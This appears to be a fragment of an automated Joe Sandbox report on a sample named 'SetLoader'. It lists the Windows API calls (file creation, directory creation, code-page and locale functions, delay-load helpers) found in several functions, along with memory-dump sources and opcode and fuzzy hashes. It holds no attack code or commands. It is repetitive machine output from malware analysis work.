                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: FileWrite$Handle
                                              • String ID:
                                              • API String ID: 4209713984-0
                                              • Opcode ID: 4517188cea6ef4a94b508cb59a112e04316931c85ab5abb0f6491be7a3ea92ad
                                              • Instruction ID: ff35b8928257361f023edf8935c908b6f1ff4ed2a479238149d9c820839c7304
                                              • Opcode Fuzzy Hash: 4517188cea6ef4a94b508cb59a112e04316931c85ab5abb0f6491be7a3ea92ad
                                              • Instruction Fuzzy Hash: A331BE71208305AFDB14CF24D858BEA77A6FF82715F081A1DF98197290CB749989CBA2
                                              APIs
                                                • Part of subcall function 0061E1EC: _wcslen.LIBCMT ref: 0061E1F2
                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000,0061BBD0,?,00000001,00000000,?,?), ref: 0061BF12
                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,00000000,0061BBD0,?,00000001,00000000,?,?), ref: 0061BF45
                                              • GetLastError.KERNEL32(?,?,?,00000000,0061BBD0,?,00000001,00000000,?,?), ref: 0061BF62
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                              • String ID:
                                              • API String ID: 2260680371-0
                                              • Opcode ID: 4c0014d2a4ae272313c8756e3bf6e8bd1b8172e138a6ea4f094106ba5994d9a2
                                              • Instruction ID: 523ea1ea5d2b9df5d2203ebecb8e85505ae642e29aaf5ee5932c7ba69bc6ad66
                                              • Opcode Fuzzy Hash: 4c0014d2a4ae272313c8756e3bf6e8bd1b8172e138a6ea4f094106ba5994d9a2
                                              • Instruction Fuzzy Hash: 7A11E175200214AEDB11AF718D05BEE77AA9F0A700F0C5458FA01DA291DB64DEC28AA9
                                              APIs
                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0063DF08
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Info
                                              • String ID:
                                              • API String ID: 1807457897-3916222277
                                              • Opcode ID: bcf797ae17e4de297f5579216d4cbbd0e767593aa106cc7ecc5024fbfb498f81
                                              • Instruction ID: 108d183f945cbcd29a5ba42394c17c7a70449ddbc080ebc0b51827c6975df214
                                              • Opcode Fuzzy Hash: bcf797ae17e4de297f5579216d4cbbd0e767593aa106cc7ecc5024fbfb498f81
                                              • Instruction Fuzzy Hash: A141287050838C9BDF258E249C84BF6BBFBEF45304F1404EDE59A87142D276AA55CFA0
                                              APIs
                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 0063D62D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: String
                                              • String ID: LCMapStringEx
                                              • API String ID: 2568140703-3893581201
                                              • Opcode ID: 794f4be6848a681c4f534c6cee671e20fc66c2244ac80dc8678bd3ea0774b405
                                              • Instruction ID: 1754e23b1102fb0d4d55955bbfdf2e7af106ece0f129d280303ceb58e51c3e2a
                                              • Opcode Fuzzy Hash: 794f4be6848a681c4f534c6cee671e20fc66c2244ac80dc8678bd3ea0774b405
                                              • Instruction Fuzzy Hash: 26010832540219BBCF12AFA0ED02DEE7FA7EF4E750F054119FE1825160CA768A31EB85
                                              APIs
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0063CBBF), ref: 0063D5A5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: CountCriticalInitializeSectionSpin
                                              • String ID: InitializeCriticalSectionEx
                                              • API String ID: 2593887523-3084827643
                                              • Opcode ID: 608bff8acd0a4288e0ca984b79412fff3d2974b5e591a0bdf630389af606c3e2
                                              • Instruction ID: e3ae50f50702b07f14a199da19116e1f2b33f00c6174edb14ff81c4100cd6b26
                                              • Opcode Fuzzy Hash: 608bff8acd0a4288e0ca984b79412fff3d2974b5e591a0bdf630389af606c3e2
                                              • Instruction Fuzzy Hash: 52F0E93168121CBBCF05AFA4DD01DAE7F63DF1A721F014129FD045A260CA714E10D7D5
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Alloc
                                              • String ID: FlsAlloc
                                              • API String ID: 2773662609-671089009
                                              • Opcode ID: 9290c552197b259d3fb44587f4e4e61e65fbfb4c16ce15030922cdaec65788f8
                                              • Instruction ID: c370c4e59bdd9474c4684eacbfa217d3c449d04b24288c93660389d0358869dc
                                              • Opcode Fuzzy Hash: 9290c552197b259d3fb44587f4e4e61e65fbfb4c16ce15030922cdaec65788f8
                                              • Instruction Fuzzy Hash: 55E0E531681218B79704ABA4BC12D6EBBA7CB4A711F410169FC0557241CE715E0196CA
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006310BA
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID: 3To
                                              • API String ID: 1269201914-245939750
                                              • Opcode ID: c1a74fca7f420e3947901dd67ec95f625d86d8ef8419eed84c813339b5475a75
                                              • Instruction ID: 96c42a9c48060f32f06d8ec15f11c258a09ccd94ba1d7179fe3ae06e906a0604
                                              • Opcode Fuzzy Hash: c1a74fca7f420e3947901dd67ec95f625d86d8ef8419eed84c813339b5475a75
                                              • Instruction Fuzzy Hash: 71B012E139C100BC33193244AC12C36014FC4CAB10730CA3EF404C4080D9406CC910B2
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00630A5D
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID: FjuKc
                                              • API String ID: 1269201914-1445497496
                                              • Opcode ID: b7e5382a695225ff055a28b83099c5739e4efdd9dc3ea6315af60db17dc9429c
                                              • Instruction ID: 5dad63c23893ff332ef278de41521132efc3e205398ee463efe444dcc9342a04
                                              • Opcode Fuzzy Hash: b7e5382a695225ff055a28b83099c5739e4efdd9dc3ea6315af60db17dc9429c
                                              • Instruction Fuzzy Hash: F1B012C539C100ED33455298AD32C37018FD4C4B10B30C47EF448C0041D4411C0B0171
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00630A5D
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID: FjuKc
                                              • API String ID: 1269201914-1445497496
                                              • Opcode ID: 0cdb2a4fc7d05d344a4ce7eb5d7e9baff171b93852fe59170a57b276fe7f0f59
                                              • Instruction ID: eb3241a318e0535c1ca89037cf5c4dc94463687c619030e4d02b55ecd2f73bad
                                              • Opcode Fuzzy Hash: 0cdb2a4fc7d05d344a4ce7eb5d7e9baff171b93852fe59170a57b276fe7f0f59
                                              • Instruction Fuzzy Hash: 2FB012C53AC200FD33855298AC32C36018FD4C4B20B30C53EF048C0441D4401C4A0171
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00630A5D
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID: FjuKc
                                              • API String ID: 1269201914-1445497496
                                              • Opcode ID: 1df2193e9da9027a5c083e4d8bf90c2d78280ad5ef1165cc95c14f759bd486cd
                                              • Instruction ID: d340abbe4b467d50703f0ca47313d643a9f44aa22f40f707267b745bfd9ff6e1
                                              • Opcode Fuzzy Hash: 1df2193e9da9027a5c083e4d8bf90c2d78280ad5ef1165cc95c14f759bd486cd
                                              • Instruction Fuzzy Hash: DCA002D5299101FD32455295AD36C36015ED4C5B55B31995DF445C44415441185A5075
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00630A5D
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID: FjuKc
                                              • API String ID: 1269201914-1445497496
                                              • Opcode ID: c4741513cdd58072e750f4c015565098231bef1592d5d5d07baa7621ffe221da
                                              • Instruction ID: d340abbe4b467d50703f0ca47313d643a9f44aa22f40f707267b745bfd9ff6e1
                                              • Opcode Fuzzy Hash: c4741513cdd58072e750f4c015565098231bef1592d5d5d07baa7621ffe221da
                                              • Instruction Fuzzy Hash: DCA002D5299101FD32455295AD36C36015ED4C5B55B31995DF445C44415441185A5075
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00630A5D
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID: FjuKc
                                              • API String ID: 1269201914-1445497496
                                              • Opcode ID: 6a47064488d15d1bdeb4ad5294041373ef93d2c9ea18dfbadf994f32fb30c781
                                              • Instruction ID: 083d7917f3c4d63750183a5c90148ad96d7939fad858bc2bc345a9d7d98b41c2
                                              • Opcode Fuzzy Hash: 6a47064488d15d1bdeb4ad5294041373ef93d2c9ea18dfbadf994f32fb30c781
                                              • Instruction Fuzzy Hash: B8A012C5294100BC32055290AC36C36028ED4C0B10B30841DF040C00416440180A0070
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00630A5D
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID: FjuKc
                                              • API String ID: 1269201914-1445497496
                                              • Opcode ID: 68604b9752a2299f0a76f5d23a000d70558dc73d11fbb278ff25c53bd729af78
                                              • Instruction ID: d340abbe4b467d50703f0ca47313d643a9f44aa22f40f707267b745bfd9ff6e1
                                              • Opcode Fuzzy Hash: 68604b9752a2299f0a76f5d23a000d70558dc73d11fbb278ff25c53bd729af78
                                              • Instruction Fuzzy Hash: DCA002D5299101FD32455295AD36C36015ED4C5B55B31995DF445C44415441185A5075
                                              APIs
                                                • Part of subcall function 0063DE0B: GetOEMCP.KERNEL32(00000000,?,?,0063E094,?), ref: 0063DE36
                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0063E0D9,?,00000000), ref: 0063E2B4
                                              • GetCPInfo.KERNEL32(00000000,0063E0D9,?,?,?,0063E0D9,?,00000000), ref: 0063E2C7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: CodeInfoPageValid
                                              • String ID:
                                              • API String ID: 546120528-0
                                              • Opcode ID: a6927684b912c2841937f786d61cc8e2ecf20511c592af6fb5902c5a92147df6
                                              • Instruction ID: d881da925a82649e385a4d7b092610028ba29546f9c568e972513a64967590e9
                                              • Opcode Fuzzy Hash: a6927684b912c2841937f786d61cc8e2ecf20511c592af6fb5902c5a92147df6
                                              • Instruction Fuzzy Hash: 065106709042069FEB249F75C8916FBBBE7EF56300F14446ED0968B392D736A942CBE0
                                              APIs
                                              • SetFilePointer.KERNELBASE(000000FF,?,00000800,?,?,00000000,?,?,0061B43B,00000800,00000800,00000000,?,?,0061A31D,?), ref: 0061B5EB
                                              • GetLastError.KERNEL32(?,?,0061A31D,?,?,?,?,?,?,?,?), ref: 0061B5FA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastPointer
                                              • String ID:
                                              • API String ID: 2976181284-0
                                              • Opcode ID: 9431683866b6e7f33da1780cf1cd2b53f81e8c40fb6e4632535f9785cbbf1c2e
                                              • Instruction ID: a34ceadbb8a2f4ad5e55217c1a820020143e9cc6da31cac716f35d8396d79ca5
                                              • Opcode Fuzzy Hash: 9431683866b6e7f33da1780cf1cd2b53f81e8c40fb6e4632535f9785cbbf1c2e
                                              • Instruction Fuzzy Hash: AC41EF752043418BD720EF65D9849EAB3E7FF58320F18A62DE84683352D7B4D8C18BA2
                                              APIs
                                              • CreateFileW.KERNELBASE(?,?,00000000,00000000,00000002,00000000,00000000,?,00000000,?,?,?,0061B967,?,?,006187FD), ref: 0061B0A4
                                              • CreateFileW.KERNEL32(?,?,00000000,00000000,00000002,00000000,00000000,?,?,00000800,?,?,0061B967,?,?,006187FD), ref: 0061B0D4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 9e00995b7b803e58ae967a73a46a39a951b6dc717f433ca238aea66c8819fba2
                                              • Instruction ID: ee1fdd7cbbc42d5677428d55eabdc035f204516d5fe5e6a14ab19a83bb7a4735
                                              • Opcode Fuzzy Hash: 9e00995b7b803e58ae967a73a46a39a951b6dc717f433ca238aea66c8819fba2
                                              • Instruction Fuzzy Hash: 38218D71504384AFE370DB24CC85BF7B7DEEB89321F044A1DF9A5C62D1D774A8848A62
                                              APIs
                                              • FlushFileBuffers.KERNEL32(?), ref: 0061B7FC
                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 0061B8B0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: File$BuffersFlushTime
                                              • String ID:
                                              • API String ID: 1392018926-0
                                              • Opcode ID: 8cb3b6de39b8c6c87b660d4be761e8b559027315a267f73140f29800ba315195
                                              • Instruction ID: 82322901a3f6f38487895ee2fd443e519dbced57e910074def22fb2288fe8baf
                                              • Opcode Fuzzy Hash: 8cb3b6de39b8c6c87b660d4be761e8b559027315a267f73140f29800ba315195
